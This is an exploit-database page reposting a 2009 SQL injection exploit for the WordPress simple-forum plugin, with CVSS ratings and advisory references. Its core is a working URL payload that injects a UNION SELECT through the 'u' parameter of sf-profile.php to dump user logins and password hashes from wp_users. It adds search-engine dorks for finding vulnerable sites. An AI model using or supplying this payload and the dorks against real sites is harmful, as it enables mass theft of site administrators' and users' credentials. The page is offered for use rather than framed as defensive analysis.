WordPress SQL Injection(wp-content-simple-forum)

2009.08.25
Credit: hackturkiye
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

########### # # # WordPress SQL Injection(wp-content-simple-forum) # ########### # # # AUTHOR : S@BUN # # HOME : http://www.hackturkiye.com/ # ########### # # # DORKS 1 : allinurl :"wp-content/plugins/simple-forum" # # DORK 2 : allinurl :"simple-forum/ahah" # ########### ## EXPLOIT : wp-content/plugins/simple-forum/ahah/sf-profile.php?u=-999999%2F%2A%2A%2 Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C4%2Cconcat(0x7c,user _login,0x7c,user_pass,0x7c)%2C6%2C7%2C8%2C0x7c%2F%2A%2A%2Ffrom%2F%2A%2A% 2Fwp_users ########### # S@BUN GOOD LUCKY S@BUN ###########

References:

http://xforce.iss.net/xforce/xfdb/41578
http://www.securityfocus.com/bid/27854
http://www.securityfocus.com/archive/1/488279
http://osvdb.org/52210


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top